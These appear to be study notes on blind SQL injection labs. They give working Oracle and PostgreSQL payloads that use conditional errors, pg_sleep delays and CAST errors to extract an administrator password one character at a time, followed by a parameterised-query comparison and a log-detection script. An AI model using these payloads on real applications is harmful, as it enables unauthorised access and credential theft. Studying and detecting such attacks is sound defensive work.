Blind SQL Inj

The document outlines a series of SQL injection techniques used to probe a database for information, specifically targeting the existence of a user named 'administrator' and the length of their password. It demonstrates the use of various SQL queries to determine the database type (Oracle or PostgreSQL) and to extract data without causing errors. The document provides a step-by-step approach to retrieving sensitive information through blind SQL injection methods.

1) Find the injection point and identify the database

The application runs this query with the TrackingId cookie value:

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'

A doubled quote keeps the string literal balanced:

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4''' -> did not return any error

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' || SELECT '' || '' -> this also should not have returned any error, but it did, so it can indicate the server is not MySQL; maybe it is Oracle (where every SELECT needs a FROM clause).

' || (SELECT '' from dual) || ' -> this returned 200, which means we are dealing with an Oracle DB
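The quote and `||` probes above only tell the attacker anything because the cookie value is pasted straight into the SQL text. The following is an added example, not part of these notes or of the lab, that builds the TrackingId lookup both ways against a constructed in-memory SQLite database and runs probes in the shapes used above. SQLite's `abs()` overflow stands in for Oracle's TO_CHAR(1/0), since SQLite does not raise on 1/0; the tables, rows and probe names are constructed.

```python
import sqlite3

# Constructed sample schema and rows (not the lab's data). Table and column
# names follow the query shown in the notes; the values are placeholders.
SCHEMA = """
CREATE TABLE TrackedUsers (TrackingId TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO TrackedUsers VALUES ('u5YD3PapBcR4lN3e7Tj4');
INSERT INTO users VALUES ('administrator', 'placeholder-password');
"""
VALID_ID = "u5YD3PapBcR4lN3e7Tj4"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, tracking_id):
    """String-builds the query: the cookie value becomes part of the SQL text."""
    sql = ("SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '"
           + tracking_id + "'")
    try:
        return ("ok", len(conn.execute(sql).fetchall()))
    except sqlite3.Error as exc:        # the web app would answer 500 here
        return ("error", str(exc))


def lookup_parameterized(conn, tracking_id):
    """Binds the cookie value: it is data and can never alter the statement."""
    sql = "SELECT TrackingId FROM TrackedUsers WHERE TrackingId = ?"
    try:
        return ("ok", len(conn.execute(sql, (tracking_id,)).fetchall()))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# SQLite stand-in for Oracle's TO_CHAR(1/0): abs() of the smallest int64 raises
# "integer overflow" at run time, and a CASE branch is evaluated only when taken.
ERR = "abs(-9223372036854775808)"

# Constructed probes in the shapes used in the notes: a stray quote, a doubled
# quote, a conditional error, and a conditional change to the matched value.
PROBES = {
    "valid":      VALID_ID,
    "quote":      VALID_ID + "'",
    "two_quotes": VALID_ID + "''",
    "err_true":   "' || (SELECT CASE WHEN (1=1) THEN " + ERR + " ELSE '' END) || '",
    "err_false":  "' || (SELECT CASE WHEN (1=2) THEN " + ERR + " ELSE '' END) || '",
    "bool_true":  VALID_ID + "' || (SELECT CASE WHEN (1=1) THEN 'x' ELSE '' END) || '",
    "bool_false": VALID_ID + "' || (SELECT CASE WHEN (1=2) THEN 'x' ELSE '' END) || '",
}


def run_probes(lookup):
    """Maps each probe name to ('ok', row count) or ('error', message)."""
    conn = fresh_db()
    return {name: lookup(conn, value) for name, value in PROBES.items()}


if __name__ == "__main__":
    vuln, safe = run_probes(lookup_vulnerable), run_probes(lookup_parameterized)
    for name in PROBES:
        print(f"{name:11} vulnerable={vuln[name]!s:28} parameterized={safe[name]}")
```

With the string-built query the response depends on what is inside the cookie: the stray quote and err_true produce an error, bool_true turns the matching id into a non-match, and bool_false still matches. With the bound parameter every probe except the genuine id returns ok with zero rows, so neither the status code nor the matched row leaks anything about the condition.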

2) Prove the users table exists

' || (SELECT '' from users) || ' -> this returned 500: the subquery returns one row per user, so '' may be repeated several times where a single value is expected, and we need to limit the output to one row

' || (SELECT '' from users where rownum=1) || ' -> 200 OK

3) Prove administrator exists in users:

' || (SELECT username from users where username='administrator')='administrator' || '

' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || ' -> this returns 200 OK

4) We proved admin exists; now let's check the length of the password.

' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>1) || ' -> 500
' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>50) || ' -> 200 OK

Put the payload in Burp Intruder, varying the number, to find out the exact number of characters.

5) Is the first letter 'a'?

' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password, 1, 1)='a') || '
' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password, 2, 1)='a') || '

fahhy0hikq073tya774b

TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--


TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT 1) AS int)--
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' --
' AND 1=CAST((SELECT username from users limit 1) AS int) --

'||pg_sleep(10)--

Lab: Blind SQL injection with time delays and information retrieval
'||pg_sleep(10) -- -> check which database we are dealing with: the delay means PostgreSQL
'|| CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END -- worked -> 1=1 delays; now let's try a query to check whether a condition is right
'|| CASE WHEN ((select username from users where username='administrator')='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END -- delayed 10 sec -> so the admin user exists
'|| CASE WHEN ((select SUBSTR(password, 1, 1) from users where username='administrator')='a') THEN pg_sleep(10) ELSE pg_sleep(0) END -- -> password length is 20
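Every probe in these notes leaves a distinctive trace in the request log: a stray quote, `||`, CASE WHEN, a division by zero, SUBSTR/LENGTH, and a response that takes ten seconds once pg_sleep fires. The following added example, not from the page, runs a small rule set over constructed proxy log lines in the shapes above and reports the client that is stepping through characters one request at a time. The log format, the rule weights and the slow-response threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed proxy log lines (not real traffic). Fields are tab-separated:
# client IP, HTTP status, response time in ms, and the TrackingId cookie as sent.
SAMPLE_LOG = [
    "10.0.0.5\t200\t38\tTrackingId=u5YD3PapBcR4lN3e7Tj4",
    "10.0.0.9\t500\t41\tTrackingId=u5YD3PapBcR4lN3e7Tj4'",
    "10.0.0.9\t200\t40\tTrackingId=u5YD3PapBcR4lN3e7Tj4''",
    "10.0.0.9\t200\t39\tTrackingId=' || (SELECT '' from dual) || '",
    "10.0.0.9\t500\t44\tTrackingId=' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END "
    "FROM users where username='administrator' and LENGTH(password)>1) || '",
    "10.0.0.9\t200\t10042\tTrackingId='||pg_sleep(10)--",
    "10.0.0.7\t200\t35\tTrackingId=ogAZZfxtOKUELbuJ",
]

# (rule name, regex, weight): markers of the blind-injection shapes in the notes.
RULES = [
    ("concat",     re.compile(r"\|\|"), 1),
    ("case_when",  re.compile(r"\bCASE\s+WHEN\b", re.I), 2),
    ("div_zero",   re.compile(r"\b1\s*/\s*0\b"), 2),
    ("sleep",      re.compile(r"\b(pg_sleep|sleep|waitfor\s+delay)\b", re.I), 2),
    ("char_probe", re.compile(r"\b(SUBSTR|SUBSTRING|LENGTH)\s*\(", re.I), 1),
    ("cast_probe", re.compile(r"\bCAST\s*\(", re.I), 1),
    ("comment",    re.compile(r"--|/\*"), 1),
    ("from_dual",  re.compile(r"\bFROM\s+dual\b", re.I), 2),
]
SLOW_MS = 5000  # assumed threshold, well below the 10 s delays used in the notes


def parse_line(line):
    client, status, ms, cookie = line.split("\t")
    value = unquote(cookie.split("=", 1)[1])   # also handles URL-encoded logging
    return {"client": client, "status": int(status), "ms": int(ms), "value": value}


def score_value(rec):
    """Returns (score, sorted rule names) for one parsed record."""
    hits, score = [], 0
    if rec["value"].count("'") % 2 == 1:       # stray quote: breaks the SQL string
        hits.append("odd_quote")
        score += 1
    for name, rx, weight in RULES:
        if rx.search(rec["value"]):
            hits.append(name)
            score += weight
    if "sleep" in hits and rec["ms"] >= SLOW_MS:   # the delay actually happened
        hits.append("slow_response")
        score += 2
    return score, sorted(hits)


def analyze(lines):
    findings = []
    for line in lines:
        rec = parse_line(line)
        score, hits = score_value(rec)
        # a lone stray quote is only interesting when it produced a server error
        flagged = score >= 2 or (score >= 1 and rec["status"] >= 500)
        rec.update(score=score, rules=hits, flagged=flagged)
        findings.append(rec)
    return findings


def enumerating_clients(findings, min_hits=3):
    """Clients with many flagged requests: the signature of char-by-char extraction."""
    counts = Counter(f["client"] for f in findings if f["flagged"])
    return {c: n for c, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for r in results:
        print(r["client"], r["status"], r["ms"], "FLAG" if r["flagged"] else "ok", r["rules"])
    print("enumerating:", enumerating_clients(results))
```

On the constructed lines the benign cookies score zero, the 500 with a stray quote is flagged on its own because the error confirms the quote reached the parser, and the CASE and pg_sleep probes score high enough to be flagged regardless of status. The per-client count is the signal worth alerting on: a single odd request is noise, but dozens of flagged requests from one client that differ only in a position or a character are an extraction loop in progress.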
